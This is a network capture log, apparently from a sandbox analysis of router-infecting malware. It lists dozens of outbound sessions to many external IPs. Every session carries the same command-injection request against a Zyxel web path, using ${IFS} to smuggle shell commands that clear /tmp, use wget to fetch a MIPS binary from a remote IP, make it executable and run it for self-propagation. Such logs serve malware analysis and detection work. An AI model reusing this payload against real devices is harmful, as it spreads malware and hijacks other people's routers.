                                                Jan 29, 2024 07:07:59.567835093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7210192.168.2.235535084.45.255.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567893028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7211192.168.2.234834840.149.34.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567918062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7212192.168.2.234270232.74.47.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567956924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7213192.168.2.2333402144.21.85.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568020105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7214192.168.2.2355574119.126.191.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568053961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7215192.168.2.2359342114.41.125.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568095922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7216192.168.2.2349964168.143.193.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568135023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7217192.168.2.2342180124.10.20.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568264961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7218192.168.2.2339938141.209.3.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568283081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7219192.168.2.2356288201.230.138.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568346977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7220192.168.2.2358484197.7.85.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568384886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7221192.168.2.2338936103.236.246.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568422079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7222192.168.2.2342928140.18.219.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568470001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7223192.168.2.235666470.118.209.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568501949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7224192.168.2.235638275.36.38.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568533897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7225192.168.2.2359350138.63.82.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568563938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7226192.168.2.23350925.218.201.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568614006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7227192.168.2.234992280.74.243.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568665981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7228192.168.2.2352258151.238.101.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568697929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7229192.168.2.233651251.76.38.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568747997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7230192.168.2.2340156187.149.217.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568808079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7231192.168.2.2347940219.248.161.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568842888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7232192.168.2.2337840197.148.62.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568870068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7233192.168.2.2350756104.23.187.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568909883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7234192.168.2.2347918197.112.158.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568962097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7235192.168.2.234468842.118.46.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.568989038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7236192.168.2.2343388143.80.125.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569021940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7237192.168.2.2354610219.199.152.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569080114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7238192.168.2.233752414.230.37.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569108009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7239192.168.2.235668069.69.211.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569128990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7240192.168.2.2340798172.156.195.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569166899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7241192.168.2.234288276.151.217.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569200993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7242192.168.2.2346870114.113.118.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569262028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7243192.168.2.234280868.154.164.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569289923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7244192.168.2.235745487.112.221.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569348097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7245192.168.2.2333278139.119.105.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569394112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7246192.168.2.2342626152.250.91.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569477081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7247192.168.2.233724845.18.16.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569511890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7248192.168.2.2360550101.82.118.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569533110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7249192.168.2.2335314193.209.79.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569572926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7250192.168.2.2355510110.78.167.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569633007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7251192.168.2.234038097.7.91.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569639921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7252192.168.2.234270079.124.147.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569699049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7253192.168.2.2335970216.100.52.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569752932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7254192.168.2.235039019.27.178.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569796085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7255192.168.2.2341960159.5.160.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569854975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7256192.168.2.2353978102.242.15.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569909096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7257192.168.2.2352220178.61.4.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569921970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7258192.168.2.2354240179.35.134.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569952011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7259192.168.2.234386885.197.131.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.569998980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7260192.168.2.2359912179.17.8.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570046902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7261192.168.2.2339902126.127.202.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570086002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7262192.168.2.235526453.84.205.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570116997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7263192.168.2.235946687.59.118.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570168018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7264192.168.2.235483241.99.74.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570208073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7265192.168.2.233374634.110.255.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570239067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7266192.168.2.2353688222.60.1.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570287943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7267192.168.2.2336980110.193.4.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570312977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7268192.168.2.2349878199.84.8.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570352077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7269192.168.2.234171273.133.229.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570425987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7270192.168.2.2354074144.223.207.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570456028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7271192.168.2.2343070166.152.231.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570501089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7272192.168.2.2346914117.86.68.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570550919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7273192.168.2.2359954110.41.184.110443
                                                TimestampBytes transferredDirectionData
